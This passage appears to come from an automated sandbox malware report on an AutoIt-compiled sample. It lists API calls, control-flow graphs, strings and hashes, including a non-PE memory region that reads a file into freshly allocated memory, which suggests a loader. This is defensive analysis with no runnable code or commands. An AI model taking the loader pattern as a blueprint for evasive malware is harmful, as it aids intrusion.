                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                • API String ID: 2641332412-570651680
                                                • Opcode ID: abe79f0f078ed238a0c3e78218ea64d93a0bfbccf0be590ce95d8cfd08e736a2
                                                • Instruction ID: e974a50e0735c4f0c3279d1187b52cf8360652866881e7a8a98b61ad13df32ef
                                                • Opcode Fuzzy Hash: abe79f0f078ed238a0c3e78218ea64d93a0bfbccf0be590ce95d8cfd08e736a2
                                                • Instruction Fuzzy Hash: B262A170504340DFEB24DF24C985BAA77E4FF85304F5849ADF9868B2D2DB759884CB62
                                                APIs
                                                • ___createFile.LIBCMT ref: 00AD5EC3
                                                • ___createFile.LIBCMT ref: 00AD5F04
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AD5F2D
                                                • __dosmaperr.LIBCMT ref: 00AD5F34
                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00AD5F47
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00AD5F6A
                                                • __dosmaperr.LIBCMT ref: 00AD5F73
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AD5F7C
                                                • __set_osfhnd.LIBCMT ref: 00AD5FAC
                                                • __lseeki64_nolock.LIBCMT ref: 00AD6016
                                                • __close_nolock.LIBCMT ref: 00AD603C
                                                • __chsize_nolock.LIBCMT ref: 00AD606C
                                                • __lseeki64_nolock.LIBCMT ref: 00AD607E
                                                • __lseeki64_nolock.LIBCMT ref: 00AD6176
                                                • __lseeki64_nolock.LIBCMT ref: 00AD618B
                                                • __close_nolock.LIBCMT ref: 00AD61EB
                                                  • Part of subcall function 00ACEA9C: CloseHandle.KERNELBASE(00000000,00B4EEF4,00000000,?,00AD6041,00B4EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ACEAEC
                                                  • Part of subcall function 00ACEA9C: GetLastError.KERNEL32(?,00AD6041,00B4EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00ACEAF6
                                                  • Part of subcall function 00ACEA9C: __free_osfhnd.LIBCMT ref: 00ACEB03
                                                  • Part of subcall function 00ACEA9C: __dosmaperr.LIBCMT ref: 00ACEB25
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                • __lseeki64_nolock.LIBCMT ref: 00AD620D
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00AD6342
                                                • ___createFile.LIBCMT ref: 00AD6361
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AD636E
                                                • __dosmaperr.LIBCMT ref: 00AD6375
                                                • __free_osfhnd.LIBCMT ref: 00AD6395
                                                • __invoke_watson.LIBCMT ref: 00AD63C3
                                                • __wsopen_helper.LIBCMT ref: 00AD63DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                • String ID: @
                                                • API String ID: 3896587723-2766056989
                                                • Opcode ID: b7d02e9e82ea68b7e666dbc628dd52eb043a208cfb7aa116ad41a02ce91789ae
                                                • Instruction ID: 004717685f34d20eff4e0c54e457fdf4fce11038db5ede61db42507eb4b9ceaf
                                                • Opcode Fuzzy Hash: b7d02e9e82ea68b7e666dbc628dd52eb043a208cfb7aa116ad41a02ce91789ae
                                                • Instruction Fuzzy Hash: F1220371D0460A9FEB299F68CC85BFD7B72EB14324F24422AE9639B3D1C6358D50CB91

                                                Control-flow Graph

                                                APIs
                                                • _wcscpy.LIBCMT ref: 00AEFA96
                                                • _wcschr.LIBCMT ref: 00AEFAA4
                                                • _wcscpy.LIBCMT ref: 00AEFABB
                                                • _wcscat.LIBCMT ref: 00AEFACA
                                                • _wcscat.LIBCMT ref: 00AEFAE8
                                                • _wcscpy.LIBCMT ref: 00AEFB09
                                                • __wsplitpath.LIBCMT ref: 00AEFBE6
                                                • _wcscpy.LIBCMT ref: 00AEFC0B
                                                • _wcscpy.LIBCMT ref: 00AEFC1D
                                                • _wcscpy.LIBCMT ref: 00AEFC32
                                                • _wcscat.LIBCMT ref: 00AEFC47
                                                • _wcscat.LIBCMT ref: 00AEFC59
                                                • _wcscat.LIBCMT ref: 00AEFC6E
                                                  • Part of subcall function 00AEBFA4: _wcscmp.LIBCMT ref: 00AEC03E
                                                  • Part of subcall function 00AEBFA4: __wsplitpath.LIBCMT ref: 00AEC083
                                                  • Part of subcall function 00AEBFA4: _wcscpy.LIBCMT ref: 00AEC096
                                                  • Part of subcall function 00AEBFA4: _wcscat.LIBCMT ref: 00AEC0A9
                                                  • Part of subcall function 00AEBFA4: __wsplitpath.LIBCMT ref: 00AEC0CE
                                                  • Part of subcall function 00AEBFA4: _wcscat.LIBCMT ref: 00AEC0E4
                                                  • Part of subcall function 00AEBFA4: _wcscat.LIBCMT ref: 00AEC0F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 2955681530-2806939583
                                                • Opcode ID: 935a1d727ecac72e2dba0290ce531e7c616d0db4f7692996a3e1f77ddaa85a8f
                                                • Instruction ID: a82a1182d2a86ee48cd1e320582f7eef6202b245680c09a1c2ce4cead478dc99
                                                • Opcode Fuzzy Hash: 935a1d727ecac72e2dba0290ce531e7c616d0db4f7692996a3e1f77ddaa85a8f
                                                • Instruction Fuzzy Hash: 9991A172504745AFDB20EB55CA51F9BB3E8FF94300F00486DF9599B292DB34EA48CB92

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00AEBDB4: __time64.LIBCMT ref: 00AEBDBE
                                                  • Part of subcall function 00AA4517: _fseek.LIBCMT ref: 00AA452F
                                                • __wsplitpath.LIBCMT ref: 00AEC083
                                                  • Part of subcall function 00AC1DFC: __wsplitpath_helper.LIBCMT ref: 00AC1E3C
                                                • _wcscpy.LIBCMT ref: 00AEC096
                                                • _wcscat.LIBCMT ref: 00AEC0A9
                                                • __wsplitpath.LIBCMT ref: 00AEC0CE
                                                • _wcscat.LIBCMT ref: 00AEC0E4
                                                • _wcscat.LIBCMT ref: 00AEC0F7
                                                • _wcscmp.LIBCMT ref: 00AEC03E
                                                  • Part of subcall function 00AEC56D: _wcscmp.LIBCMT ref: 00AEC65D
                                                  • Part of subcall function 00AEC56D: _wcscmp.LIBCMT ref: 00AEC670
                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AEC2A1
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AEC338
                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AEC34E
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AEC35F
                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AEC371
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                • String ID: p1#v`K$v
                                                • API String ID: 2378138488-1068180069
                                                • Opcode ID: e83a108e33ed8b0d782d92909ef1f11e4ed0b3d4efe8306cf50b8833aa6d53c7
                                                • Instruction ID: 2dccf9e0cd4b511b420542e911bfee6df6e65f18e2377307a61cd28b61e798da
                                                • Opcode Fuzzy Hash: e83a108e33ed8b0d782d92909ef1f11e4ed0b3d4efe8306cf50b8833aa6d53c7
                                                • Instruction Fuzzy Hash: FDC109B1A00219AFDF21DFA5CD81EDEBBBDAF49310F0040AAF609E7151DB709A458F65

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00AA3F86
                                                • RegisterClassExW.USER32(00000030), ref: 00AA3FB0
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA3FC1
                                                • InitCommonControlsEx.COMCTL32(?), ref: 00AA3FDE
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA3FEE
                                                • LoadIconW.USER32(000000A9), ref: 00AA4004
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA4013
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 26c67ddb41e7c1e9773dfb2dcadecc53809bdce0ad975c695e3d8beacf65b92f
                                                • Instruction ID: 395b6c994d768fc51a6bec208f8eed2477b39c94ffe331898869bbb146ec2c74
                                                • Opcode Fuzzy Hash: 26c67ddb41e7c1e9773dfb2dcadecc53809bdce0ad975c695e3d8beacf65b92f
                                                • Instruction Fuzzy Hash: A721F7B5D01308AFDB10DFA8E889BCEBBB4FB08700F14461AF611A72A0DBB84545DF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 962 aa3742-aa3762 964 aa37c2-aa37c4 962->964 965 aa3764-aa3767 962->965 964->965 968 aa37c6 964->968 966 aa37c8 965->966 967 aa3769-aa3770 965->967 972 b11e00-b11e2e call aa2ff6 call abe312 966->972 973 aa37ce-aa37d1 966->973 969 aa382c-aa3834 PostQuitMessage 967->969 970 aa3776-aa377b 967->970 971 aa37ab-aa37b3 DefWindowProcW 968->971 977 aa37f2-aa37f4 969->977 975 b11e88-b11e9c call ae4ddd 970->975 976 aa3781-aa3783 970->976 978 aa37b9-aa37bf 971->978 1007 b11e33-b11e3a 972->1007 979 aa37d3-aa37d4 973->979 980 aa37f6-aa381d SetTimer RegisterWindowMessageW 973->980 975->977 1001 b11ea2 975->1001 982 aa3789-aa378e 976->982 983 aa3836-aa3840 call abeb83 976->983 977->978 986 aa37da-aa37ed KillTimer call aa3847 call aa390f 979->986 987 b11da3-b11da6 979->987 980->977 984 aa381f-aa382a CreatePopupMenu 980->984 990 b11e6d-b11e74 982->990 991 aa3794-aa3799 982->991 1002 aa3845 983->1002 984->977 986->977 994 b11da8-b11daa 987->994 995 b11ddc-b11dfb MoveWindow 987->995 990->971 997 b11e7a-b11e83 call ada5f3 990->997 999 aa379f-aa37a5 991->999 1000 b11e58-b11e68 call ae55bd 991->1000 1003 b11dcb-b11dd7 SetFocus 994->1003 1004 b11dac-b11daf 994->1004 995->977 997->971 999->971 999->1007 1000->977 1001->971 1002->977 1003->977 1004->999 1008 b11db5-b11dc6 call aa2ff6 1004->1008 1007->971 1012 b11e40-b11e53 call aa3847 call aa4ffc 1007->1012 1008->977 1012->971
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00AA37B3
                                                • KillTimer.USER32(?,00000001), ref: 00AA37DD
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA3800
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA380B
                                                • CreatePopupMenu.USER32 ref: 00AA381F
                                                • PostQuitMessage.USER32(00000000), ref: 00AA382E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: 45c4cba03b1eb9a8ab31132cc769722a044a2123f13fd9259bed78d32a1b093d
                                                • Instruction ID: 8c64e696a64e9d9ae6a2e0fc94ce2081151a61f2d67d626e21da54ed0d822943
                                                • Opcode Fuzzy Hash: 45c4cba03b1eb9a8ab31132cc769722a044a2123f13fd9259bed78d32a1b093d
                                                • Instruction Fuzzy Hash: 934116F3504245ABDF25DB6CED4ABBA36A9F706301F480929F602D31D1CFA89E909761

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00AA3E79
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00AA3E88
                                                • LoadIconW.USER32(00000063), ref: 00AA3E9E
                                                • LoadIconW.USER32(000000A4), ref: 00AA3EB0
                                                • LoadIconW.USER32(000000A2), ref: 00AA3EC2
                                                  • Part of subcall function 00AA4024: LoadImageW.USER32(00AA0000,00000063,00000001,00000010,00000010,00000000), ref: 00AA4048
                                                • RegisterClassExW.USER32(?), ref: 00AA3F30
                                                  • Part of subcall function 00AA3F53: GetSysColorBrush.USER32(0000000F), ref: 00AA3F86
                                                  • Part of subcall function 00AA3F53: RegisterClassExW.USER32(00000030), ref: 00AA3FB0
                                                  • Part of subcall function 00AA3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA3FC1
                                                  • Part of subcall function 00AA3F53: InitCommonControlsEx.COMCTL32(?), ref: 00AA3FDE
                                                  • Part of subcall function 00AA3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA3FEE
                                                  • Part of subcall function 00AA3F53: LoadIconW.USER32(000000A9), ref: 00AA4004
                                                  • Part of subcall function 00AA3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA4013
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: 2e194f23c8720f7f34aaac35f53e3cc2640ef3a5df441a39e002b5481d3c987d
                                                • Instruction ID: bf6ef7e8092d074b8a9f999f2363fd1f31154b1a9b18e9f745e3967ea8c02108
                                                • Opcode Fuzzy Hash: 2e194f23c8720f7f34aaac35f53e3cc2640ef3a5df441a39e002b5481d3c987d
                                                • Instruction Fuzzy Hash: 4A2151B1D00304ABCB10DFADEC46A99BBF5EB49310F14852AE204A72E0DBB946409F91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1026 1339808-13398b6 call 13371e8 1029 13398bd-13398e3 call 133a718 CreateFileW 1026->1029 1032 13398e5 1029->1032 1033 13398ea-13398fa 1029->1033 1034 1339a35-1339a39 1032->1034 1041 1339901-133991b VirtualAlloc 1033->1041 1042 13398fc 1033->1042 1035 1339a7b-1339a7e 1034->1035 1036 1339a3b-1339a3f 1034->1036 1038 1339a81-1339a88 1035->1038 1039 1339a41-1339a44 1036->1039 1040 1339a4b-1339a4f 1036->1040 1043 1339a8a-1339a95 1038->1043 1044 1339add-1339af2 1038->1044 1039->1040 1045 1339a51-1339a5b 1040->1045 1046 1339a5f-1339a63 1040->1046 1047 1339922-1339939 ReadFile 1041->1047 1048 133991d 1041->1048 1042->1034 1049 1339a97 1043->1049 1050 1339a99-1339aa5 1043->1050 1051 1339b02-1339b0a 1044->1051 1052 1339af4-1339aff VirtualFree 1044->1052 1045->1046 1053 1339a73 1046->1053 1054 1339a65-1339a6f 1046->1054 1055 1339940-1339980 VirtualAlloc 1047->1055 1056 133993b 1047->1056 1048->1034 1049->1044 1059 1339aa7-1339ab7 1050->1059 1060 1339ab9-1339ac5 1050->1060 1052->1051 1053->1035 1054->1053 1057 1339982 1055->1057 1058 1339987-13399a2 call 133a968 1055->1058 1056->1034 1057->1034 1066 13399ad-13399b7 1058->1066 1062 1339adb 1059->1062 1063 1339ad2-1339ad8 1060->1063 1064 1339ac7-1339ad0 1060->1064 1062->1038 1063->1062 1064->1062 1067 13399ea-13399fe call 133a778 1066->1067 1068 13399b9-13399e8 call 133a968 1066->1068 1074 1339a02-1339a06 1067->1074 1075 1339a00 1067->1075 1068->1066 1076 1339a12-1339a16 1074->1076 1077 1339a08-1339a0c CloseHandle 1074->1077 1075->1034 1078 1339a26-1339a2f 1076->1078 1079 1339a18-1339a23 VirtualFree 1076->1079 1077->1076 1078->1029 1078->1034 1079->1078
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013398D9
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01339AFF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144958630.0000000001337000.00000040.00000020.00020000.00000000.sdmp, Offset: 01337000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1337000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                • Instruction ID: 3c81404ba3f8fc0f9c79f4e17f531602da3468d397ab330e0fe7d90cff46126b
                                                • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                • Instruction Fuzzy Hash: DDA1FA74E00209EBEF14CFA8C894BEEBBB5FF88309F108159E515BB281D7B59A41CB55

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1135 aa49fb-aa4a25 call aabcce RegOpenKeyExW 1138 aa4a2b-aa4a2f 1135->1138 1139 b141cc-b141e3 RegQueryValueExW 1135->1139 1140 b141e5-b14222 call abf4ea call aa47b7 RegQueryValueExW 1139->1140 1141 b14246-b1424f RegCloseKey 1139->1141 1146 b14224-b1423b call aa6a63 1140->1146 1147 b1423d-b14245 call aa47e2 1140->1147 1146->1147 1147->1141
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00AA4A1D
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B141DB
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B1421A
                                                • RegCloseKey.ADVAPI32(?), ref: 00B14249
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                • API String ID: 1586453840-614718249
                                                • Opcode ID: 42e68067763fdc67becac461b20c5a530de5ddb5116961ab0af812d2d82a1371
                                                • Instruction ID: 2f3bcde545e292e8a360dee0990b324224d503944d1c92a8550e9f86ce3671bf
                                                • Opcode Fuzzy Hash: 42e68067763fdc67becac461b20c5a530de5ddb5116961ab0af812d2d82a1371
                                                • Instruction Fuzzy Hash: EA116D71610108BEEB14ABA4DE96DEF7BBCEF09344F100054B506E31A1EB709E429B50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1162 aa36b8-aa3728 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA36E6
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3707
                                                • ShowWindow.USER32(00000000,?,?,?,?,00AA3AA3,?), ref: 00AA371B
                                                • ShowWindow.USER32(00000000,?,?,?,?,00AA3AA3,?), ref: 00AA3724
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: 1c8d7c7f6b1840f6b9f7b7bfab0434218e049d12ffacb153803bd326fab2eeb6
                                                • Instruction ID: e1ee25b9b0959772715224ec393749743ac442d326d71f123e50f3f89e123dbc
                                                • Opcode Fuzzy Hash: 1c8d7c7f6b1840f6b9f7b7bfab0434218e049d12ffacb153803bd326fab2eeb6
                                                • Instruction Fuzzy Hash: E8F0DA715402D07AEB31975BAC08E673E7ED7C6F20F14441AFA04A31F0C9A90895EAB0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1267 1339598-1339703 call 13371e8 call 1339488 CreateFileW 1274 1339705 1267->1274 1275 133970a-133971a 1267->1275 1276 13397ba-13397bf 1274->1276 1278 1339721-133973b VirtualAlloc 1275->1278 1279 133971c 1275->1279 1280 133973f-1339756 ReadFile 1278->1280 1281 133973d 1278->1281 1279->1276 1282 133975a-1339794 call 13394c8 call 1338488 1280->1282 1283 1339758 1280->1283 1281->1276 1288 13397b0-13397b8 ExitProcess 1282->1288 1289 1339796-13397ab call 1339518 1282->1289 1283->1276 1288->1276 1289->1288
                                                APIs
                                                  • Part of subcall function 01339488: Sleep.KERNELBASE(000001F4), ref: 01339499
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013396F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144958630.0000000001337000.00000040.00000020.00020000.00000000.sdmp, Offset: 01337000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1337000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: VOXAQGNXO8AIT0MCMU4D9CR
                                                • API String ID: 2694422964-2650299636
                                                • Opcode ID: 25f454bb3deae8f926f5871738963f9ebd566cb102aabc2497639f40f0fb760c
                                                • Instruction ID: 1dd328378ea4548a4dfd94cc9f4bff014800c745affa35d0900c6e19763bd5f7
                                                • Opcode Fuzzy Hash: 25f454bb3deae8f926f5871738963f9ebd566cb102aabc2497639f40f0fb760c
                                                • Instruction Fuzzy Hash: 99618330D04288DAEF11DBB4C844BEEBB75AF59304F044199E649BB2C1D6BA5B44CB69

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1291 aa51af-aa51c5 1292 aa51cb-aa51e0 call aa6b0f 1291->1292 1293 aa52a2-aa52a6 1291->1293 1296 b13ca1-b13cb0 LoadStringW 1292->1296 1297 aa51e6-aa5206 call aa6a63 1292->1297 1300 b13cbb-b13cd3 call aa510d call aa4db1 1296->1300 1297->1300 1301 aa520c-aa5210 1297->1301 1310 aa5220-aa529d call ac0d50 call aa50e6 call ac0d23 Shell_NotifyIconW call aacb37 1300->1310 1313 b13cd9-b13cf7 call aa518c call aa4db1 call aa518c 1300->1313 1303 aa5216-aa521b call aa510d 1301->1303 1304 aa52a7-aa52b0 call aa6eed 1301->1304 1303->1310 1304->1310 1310->1293 1313->1310
                                                APIs
